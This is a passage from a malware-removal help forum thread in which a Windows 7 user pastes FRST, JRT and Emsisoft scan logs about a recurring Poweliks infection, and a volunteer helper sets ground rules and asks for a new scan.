FirewallRules: [{0B7D03F1-7CD7-49EA-8100-E067E1CBF775}] => D:\games\steamapps\common\OrcsMustDieUnchained\Dashboard\Bin\SpitfireDashboard.exe
FirewallRules: [{696C9629-827E-4155-955C-C1919A04FE08}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AF5ABC92-FB52-495A-ADCD-0366FF705885}] => D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{A86F1E41-8D1F-40A3-A741-326F0AEE90C7}] => D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe
FirewallRules: [{F972FF74-D54F-4C7F-9214-76ECCCEBA030}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{BD2FD94E-29B1-42E5-A756-691E367F12B9}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{2FEB6DCD-2A28-415D-9764-09C8BE698A12}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{73DC3B85-C79F-4B96-B005-DEC5AC0395C7}] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{86505221-0E2B-4301-9D80-F6C2B536D2DF}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{2E9E731D-DD51-49DC-B01C-DFD123595AA3}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{DB98E247-2B23-4A52-86AE-1C2E17CFED31}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{4E3E9E73-8872-46B7-9E5F-05C0D08958D2}] => D:\Creative Cloud Files\Adobe Lightroom\lightroom.exe
FirewallRules: [{74E0CFD0-3E9A-425F-80F1-4307641B2819}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{EB73B562-EB9A-4B5D-AFDF-44D2C35FEA1C}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{9EABB9A8-1A38-4776-AF17-79DCB5A4EFBF}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{D173BC0F-9B67-4460-ABEC-8743D7190C0A}] => C:\Program Files\Adobe\Adobe Photoshop CC 2015.5\Photoshop.exe
FirewallRules: [{C46A0005-052C-4055-AA89-D74BA356E1B7}] => D:\games\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{27C5C39B-B9A3-4CE5-9C98-2D59F179B915}] => D:\games\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{92477BDF-B603-4B87-812A-AD3BEB137A50}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{90462001-694A-485A-B60D-BDA7B73B61EE}] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{E007AF0C-9BCA-4113-B752-BF0A93A5BFDC}] => D:\Program Files\iTunes\iTunes.exe
 
==================== Restore Points =========================
 
05-01-2017 01:51:29 Scheduled Checkpoint
07-01-2017 21:48:44 JRT Pre-Junkware Removal
08-01-2017 10:12:45 JRT Pre-Junkware Removal
08-01-2017 11:08:03 Malwarebytes Anti-Rootkit Restore Point
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/08/2017 02:53:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (01/08/2017 02:53:33 PM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (01/08/2017 02:47:53 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (01/08/2017 02:47:51 PM) (Source: DbxSvc) (EventID: 320) (User: )
Description: Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
 
Error: (01/08/2017 01:30:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 8018
 
Error: (01/08/2017 01:30:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 8018
 
Error: (01/08/2017 01:30:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (01/08/2017 01:30:47 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7020
 
Error: (01/08/2017 01:30:47 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 7020
 
Error: (01/08/2017 01:30:47 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
 
System errors:
=============
Error: (01/08/2017 01:30:49 PM) (Source: Microsoft-Windows-HAL) (EventID: 12) (User: )
Description: The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
 
Error: (01/08/2017 10:32:37 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {995C996E-D918-4A8C-A302-45719A6F4EA7} did not register with DCOM within the required timeout.
 
Error: (01/07/2017 10:19:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Bluetooth Service service failed to start due to the following error: 
The pipe has been ended.
 
Error: (01/07/2017 10:19:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Apple Mobile Device Service service failed to start due to the following error: 
The pipe has been ended.
 
Error: (01/07/2017 10:19:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Print Spooler service failed to start due to the following error: 
The service did not start due to a logon failure.
 
Error: (01/07/2017 10:19:44 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The Spooler service was unable to log on as NT AUTHORITY\SYSTEM with the currently configured password due to the following error: 
The request is not supported.
 
 
To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).
 
Error: (01/07/2017 10:19:35 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
 
Module Path: C:\Windows\System32\bcmihvsrv64.dll
 
Error: (01/07/2017 10:19:35 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
 
Module Path: C:\Windows\System32\bcmihvsrv64.dll
 
Error: (01/07/2017 10:19:34 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
 
Module Path: C:\Windows\System32\bcmihvsrv64.dll
 
Error: (01/07/2017 10:18:46 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Dell Data Vault service terminated unexpectedly.  It has done this 1 time(s).
 
 
CodeIntegrity:
===================================
  Date: 2016-10-19 19:50:59.497
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:46:47.045
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:38:23.578
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:36:25.888
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:27:18.727
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:26:15.009
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:25:57.388
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:23:04.654
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:18:47.014
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-10-19 19:17:43.089
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\SensorsApi.dll because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-6700K CPU @ 4.00GHz
Percentage of memory in use: 20%
Total physical RAM: 24514.78 MB
Available physical RAM: 19515.5 MB
Total Virtual: 49027.75 MB
Available Virtual: 43327.8 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:226.7 GB) (Free:63.03 GB) NTFS
Drive d: (DATAPART1) (Fixed) (Total:1863.01 GB) (Free:1644.87 GB) NTFS
Drive y: (RECOVERY) (Fixed) (Total:11.73 GB) (Free:3.17 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 1EAA813D)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or Vista) (Size: 238.5 GB) (Disk ID: 567A488E)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=11.7 GB) - (Type=27)
Partition 3: (Not Active) - (Size=226.7 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================
 
 
 

and a screenshot of Malwarebytes saying it's still there after all that fun runabouts. 

 

Help?!

I'll be here trying, at least until I rage quit. Thank you!

 



#2 RedArach


Posted 08 January 2017 - 07:32 PM

Latest JRT:

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.0 (12.05.2016)
Operating System: Windows 7 Professional x64 
Ran by Owner (Administrator) on Sun 01/08/2017 at 16:27:42.05
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 9 
 
Successfully deleted: C:\Windows\system32\Tasks\PCDEventLauncherTask (Task)
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4OO6WVDK (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7OPIYFE0 (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A10CTGEK (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QKDDG85O (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4OO6WVDK (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7OPIYFE0 (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A10CTGEK (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QKDDG85O (Temporary Internet Files Folder) 
 
 
 
Registry: 0 


#3 RedArach


Posted 08 January 2017 - 08:07 PM

EEK Log:

 

Emsisoft Emergency Kit - Version 12.0
Scan log
 
Date: 1/8/2017 5:03:45 PM
Scan Method: Malware
Objects Scanned: 88383
Objects Detected: 3
Duration: 0:00:36
Type: Manual scan
Computer Name: OWNER-PC


#4 RedArach


Posted 08 January 2017 - 08:33 PM

EEK says it's still here, same luck as I've had with Malwarebytes.

 

 

Emsisoft Emergency Kit - Version 12.0
Last update: 1/8/2017 5:03:19 PM
User account: Owner-PC\Owner
Computer name: OWNER-PC
OS version: Windows 7x64 Service Pack 1
 
Scan settings:
 
Scan type: Malware Scan
Objects: Rootkits, Memory, Traces, Files
 
Detect PUPs: On
Scan archives: Off
ADS Scan: On
File extension filter: Off
Direct disk access: Off
 
Scan start: 1/8/2017 5:20:04 PM
C:\Users\Owner\AppData\Local\c345b\a0f5a.bat detected: Trojan.BAT.Poweliks.Gen (B) [krnl.xmd]
C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4d3bf.lnk detected: Exploit.Poweliks.Gen.2 (B) [krnl.xmd]
C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\385b6.lnk detected: Exploit.Poweliks.Gen.1 (B) [krnl.xmd]
 
Scanned 149111
Found 3
 
Scan end: 1/8/2017 5:20:42 PM
Scan time: 0:00:38


#5 RedArach


Posted 08 January 2017 - 08:36 PM

Oh for the love of ... the smiley smirks are supposed to be ( B )   

 

lol 



#6 RedArach


Posted 08 January 2017 - 10:19 PM

Ran EEK, RKLL and Malwarebytes one more time, restarted in safe mode, and apparently that finally did the trick.  No idea why. But, I'll take it!   :lmao:



#7 RedArach


Posted 09 January 2017 - 04:18 PM

Stands corrected.. just because Malware says it ain' there, don' mean a thing.  :killcomp:

  Thus far, no response from BullGuard on what to do about this. 




#8 RedArach


Posted 10 January 2017 - 05:03 AM

still no workaround working, and silence from BullGuard. help...? :blush:



#9 Bezukhov

Bezukhov

    Bleepin' Jazz Fan!


  • Members
  • 2,618 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Providence, R.I.
  • Local time:01:30 PM

Posted 10 January 2017 - 05:26 PM

I'd like to look into this.

First, what did you do to generate that shortcut list? Are there any in it that you don't recognize?

Second, some ground rules.
  • Please do not run any tools on your own while we solve this. Some are rather powerful, and using one at the wrong moment can have catastrophic effects. Also please refrain from seeking help for this problem elsewhere. Too many cooks spoil the broth.
  • Next, it is important that the instructions given be performed in the order given. We may need one tool to finish its job before another one starts.
  • If at any time my instructions are not clear, stop and ask for clarification.
  • Rather than attach any logs to your post it is better that you copy and paste them instead, except if instructed otherwise.
  • Any program that I ask you run should only be run once.
  • As soon as your computer is clean I will let you know.
  • Please try to complete any tasks and reply in 24 to 48 hours. I will try to do likewise. In the interest of full disclosure I am still a student, and therefore anything I propose must be cleared with an instructor, which may sometimes delay my responses. The upside to this is you'll have two heads looking into your problem.
  • Lastly, do not make any changes to your computer from here on out until you get an "All Clear" from me.
Last, please run Farbar Recovery Scan Tool again.
  • Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.
Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.

Please post both logs.
To err is Human. To blame it on someone else is even more Human.

#10 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts

Posted 10 January 2017 - 06:13 PM

I realize that's a lot of text to scan thru, shortcuts are part of the FRST scans.  

   I just find it weird that the file is in the Registry, but BullGuard insists that it's still in there.  

 I'll run the FRST again in a second and post the results after. Thank you for getting back to me. 



#11 Bezukhov

Bezukhov

    Bleepin' Jazz Fan!


  • Members
  • 2,618 posts
  • Gender:Male
  • Location:Providence, R.I.
  • Local time:01:30 PM

Posted 10 January 2017 - 06:16 PM

I realize that's a lot of text to scan thru, shortcuts are part of the FRST scans.  
   I just find it weird that the file is in the Registry, but BullGuard insists that it's still in there.  
 I'll run the FRST again in a second and post the results after. Thank you for getting back to me.


No, I can handle it. Sorry for my brain freezing up. I totally forgot FRST had a shortcut feature.
To err is Human. To blame it on someone else is even more Human.

#12 RedArach

RedArach
  • Topic Starter

  • Members
  • 24 posts

Posted 10 January 2017 - 07:12 PM

No problem! If it was for brain freezes, we probably wouldn't be having this conversation ^^; lol


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 08-01-2017
Ran by Owner (administrator) on OWNER-PC (10-01-2017 16:08:32)
Running from C:\Users\Owner\Downloads
Loaded Profiles: Owner (Available Profiles: Owner)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvscpapisvr.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Dell Inc.) C:\Program Files\Dell\DW WLAN Card\WLTRYSVC.EXE
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Dell Inc.) C:\Program Files\Dell\DW WLAN Card\BCMWLTRY.EXE
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(BullGuard Ltd.) C:\Program Files\BullGuard Ltd\BullGuard\BullGuardBhvScanner.exe
(BullGuard Ltd.) C:\Program Files\BullGuard Ltd\BullGuard\BullGuardScanner.exe
(BullGuard Ltd.) C:\Program Files\BullGuard Ltd\BullGuard\BullGuardUpdate.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(Malwarebytes) D:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe
(Dell Inc.) C:\Program Files\Dell\DW WLAN Card\WLTRAY.EXE
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Malwarebytes) D:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Apple Inc.) D:\Program Files\iTunes\iTunesHelper.exe
(BullGuard Ltd.) C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe
(Valve Corporation) D:\games\Steam.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Valve Corporation) D:\games\bin\cef\cef.win7\steamwebhelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(Valve Corporation) D:\games\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Logitech Inc.) D:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DellDataVaultWiz.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpService.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpTray.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe
(Dell Inc.) C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DellDataVault.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFS.Common.Agent.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\DBRUpdate\DBRUpd.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Toaster.exe
(SoftThinks - Dell) C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRSync.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(PC-Doctor, Inc.) C:\Program Files\Dell\SupportAssist\imstrayicon.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8484056 2015-06-12] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_MAXX6] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1393880 2015-04-28] (Realtek Semiconductor)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe [611248 2015-04-19] (Waves Audio Ltd.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [322472 2015-06-23] (Intel Corporation)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\Program Files\Dell\DW WLAN Card\WLTRAY.exe [8927232 2015-12-22] (Dell Inc.)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-14] (NVIDIA Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Malwarebytes TrayApp] => D:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2776528 2016-12-14] (Malwarebytes)
HKLM\...\Run: [iTunesHelper] => D:\Program Files\iTunes\iTunesHelper.exe [176440 2016-12-06] (Apple Inc.)
HKLM\...\Run: [BullGuard] => C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe [1464088 2016-12-12] (BullGuard Ltd.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [296216 2015-06-15] (Intel Corporation)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [9080768 2016-11-15] (AVAST Software)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [LWS] => D:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-12] (Logitech Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [25779624 2016-12-21] (Dropbox, Inc.)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1165\G2AWinLogon_x64.dll [X]
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\Run: [Steam] => D:\games\steam.exe [2876704 2016-12-19] (Valve Corporation)
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2016-11-17] (Apple Inc.)
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\MountPoints2: {a72e9c2d-c934-11e5-855b-c48e8ffd48f0} - J:\VerizonWirelessUpgradeAssistantSetup.exe -a
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\avastSS.scr [53208 2016-10-03] (AVAST Software)
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
